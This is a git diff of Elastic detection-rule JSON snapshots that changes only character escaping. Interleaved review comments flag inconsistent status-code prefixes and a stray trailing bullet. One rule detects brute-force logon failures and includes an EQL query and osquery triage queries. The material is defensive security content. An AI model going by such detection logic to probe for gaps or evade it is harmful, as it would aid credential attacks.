diff --git a/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_103.json b/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_103.json
index 06a66e4d0fe..8027aaba455 100644
--- a/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_103.json
@@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "483c4daf-b0c6-49e0-adf3-0bfa93231d6b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_104.json b/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_104.json index 505be2b9dac..3ec1c902d98 100644 --- a/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_104.json +++ b/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_104.json 
@@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "483c4daf-b0c6-49e0-adf3-0bfa93231d6b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_105.json b/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_105.json index 50992e85642..4ec4c41394f 100644 --- a/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_105.json +++ b/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_105.json 
@@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "483c4daf-b0c6-49e0-adf3-0bfa93231d6b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_106.json b/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_106.json index 2187140b7c1..c4e70bf8f40 100644 --- a/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_106.json +++ b/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_106.json 
@@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "483c4daf-b0c6-49e0-adf3-0bfa93231d6b", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_1.json b/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_1.json index 2b2caa06150..22504b11e0e 100644 --- a/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_1.json +++ b/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_1.json 
@@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_1.json b/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_1.json index d85e9048382..1f282f7bdc6 100644 --- a/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_1.json +++ b/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_1.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -96,7 +96,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_2.json b/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_2.json index ca65fe8c297..0bea881a2f2 100644 --- a/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_2.json +++ b/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_2.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -101,7 +101,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_3.json b/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_3.json index 54381134e61..c89b8cb9fa1 100644 
--- a/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_3.json +++ b/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_3.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -101,7 +101,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_4.json b/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_4.json index ecad6edac17..3e2ae08f424 100644 --- a/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_4.json +++ b/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_4.json @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -102,7 +102,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_5.json b/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_5.json index 25203a02350..55cfc2a47db 100644 --- a/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_5.json +++ b/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_5.json @@ -86,7 +86,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", 
@@ -108,7 +108,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_6.json b/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_6.json index 0a8d901fc5d..e36b4cdf8e8 100644 --- a/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_6.json +++ b/packages/security_detection_engine/kibana/security_rule/48b3d2e3-f4e8-41e6-95e6-9b2091228db3_6.json @@ -86,7 +86,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -108,7 +108,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_4.json b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_4.json index 1939cc79f8d..9a816944dce 100644 --- a/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_4.json +++ b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_4.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Multiple Logon Failure from the same Source Address", - "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure from the same Source Address\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user names.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine 
the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity\n\n### False positive analysis\n\n- Understand the context of the authentications by contacting the asset owners. This activity can be related to a new or existing automation or business process that is in a failing state.\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure Followed by Logon Success - 4e85dc8a-3e41-40d8-bc28-91af7ac6cf60\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure from the same Source Address\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user names.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity\n\n### False positive analysis\n\n- Understand the context of the authentications by contacting the asset owners. 
This activity can be related to a new or existing automation or business process that is in a failing state.\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure Followed by Logon Success - 4e85dc8a-3e41-40d8-bc28-91af7ac6cf60\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where host.os.type == \"windows\" and event.action == \"logon-failed\" and\n /* event 4625 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\" and\n\n /*\n noisy failure status codes often associated to authentication misconfiguration :\n 0xC000015B - The user has not been granted the requested logon type (also called the logon right) at this machine.\n 0XC000005E\t- There are currently no logon servers available to service the logon request.\n 0XC0000133\t- Clocks between DC and other computer too far out of sync.\n 0XC0000192\tAn attempt was made to logon, but the Netlogon service was not started.\n */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=10\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625" 
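Review bot: The `query` text on the new side mixes `0x` and `0X` prefixes in the status-code exclusion, `not winlog.event_data.Status : ("0xC000015B", "0XC000005E", "0XC0000133", "0XC0000192")`; EQL's `:` operator compares case-insensitively so the exclusion still works, but the inconsistency invites a copy into a case-sensitive `==` comparison where the `0X` entries would silently stop matching. The explanatory comment block inside the same query also drops the ` - ` separator on its last entry, `0XC0000192\tAn attempt was made to logon...`, and uses tab characters where the other entries use ` - `. Since this file is a frozen rule-version snapshot that the commit only re-serializes, normalising the prefixes and the comment belongs in the rule source for the next version rather than in this artifact; the identical query text appears unchanged in the `_5` hunk of this rule below. The rule object enclosing this hunk starts and ends outside it.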
@@ -72,7 +72,7 @@ ], "risk_score": 47, "rule_id": "48b6edfc-079d-4907-b43c-baffa243270d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_5.json b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_5.json index 16943da7f68..9e730769535 100644 --- a/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_5.json +++ b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_5.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Multiple Logon Failure from the same Source Address", - "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure from the same Source Address\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user names.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine 
the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity\n\n### False positive analysis\n\n- Understand the context of the authentications by contacting the asset owners. 
This activity can be related to a new or existing automation or business process that is in a failing state.\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure Followed by Logon Success - 4e85dc8a-3e41-40d8-bc28-91af7ac6cf60\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n-", + "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure from the same Source Address\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. 
More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user names.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, 
service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity\n\n### False positive analysis\n\n- Understand the context of the authentications by contacting the asset owners. This activity can be related to a new or existing automation or business process that is in a failing state.\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure Followed by Logon Success - 4e85dc8a-3e41-40d8-bc28-91af7ac6cf60\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n-", "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where host.os.type == \"windows\" and event.action == \"logon-failed\" and\n /* event 4625 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\" and\n\n /*\n noisy failure status codes often associated to authentication misconfiguration :\n 0xC000015B - The user has not been granted the requested logon type (also called the logon right) at this machine.\n 0XC000005E\t- There are currently no logon servers available to service the logon request.\n 0XC0000133\t- Clocks between DC and other computer too far out of sync.\n 0XC0000192\tAn attempt was made to logon, but the Netlogon service was not started.\n */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=10\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", @@ -87,7 +87,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
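Review bot: The `note` value on the new side still ends with `\n\n-` immediately before the closing quote (after the `(MTTR).` sentence), which renders as an empty dangling bullet at the end of the investigation guide; the commit only unescapes `\u003e` to `>` and leaves that trailer in place. The fix is to drop the trailing `\n\n-` so the string ends at `...the mean time to respond (MTTR).`. As this `_5` file is a versioned snapshot, the correction should land in the rule source so the next exported version picks it up; the `_6` snapshot that follows is cut off in this view, so whether it carries the same trailer is unconfirmed. The rule object enclosing this hunk starts and ends outside it.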
diff --git a/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_6.json b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_6.json index 78ba41e38cf..8bf24447960 100644 --- a/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_6.json +++ b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_6.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Multiple Logon Failure from the same Source Address", - "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure from the same Source Address\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user names.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet 